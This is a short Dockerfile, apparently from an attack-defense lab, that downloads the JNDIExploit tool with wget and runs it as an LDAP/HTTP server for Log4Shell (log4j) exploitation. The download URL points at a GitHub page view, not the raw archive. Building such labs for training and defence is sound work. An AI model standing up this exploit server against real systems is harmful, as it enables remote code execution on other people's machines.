FROM openjdk:8u181-jdk-alpine
EXPOSE 8888
EXPOSE 1389
RUN mkdir /app
RUN cd /app && wget https://github.com/gyaansastra/Attack-Defense-Lab/blob/dev/docker-compose/shunya/log4j/poc1/jndi/JNDIExploit.v1.2.zip && unzip JNDIExploit.v1.2.zip
CMD ["java", "-jar", "/app/JNDIExploit-1.2-SNAPSHOT.jar", "-i", "jndi", "-p", "8888"]
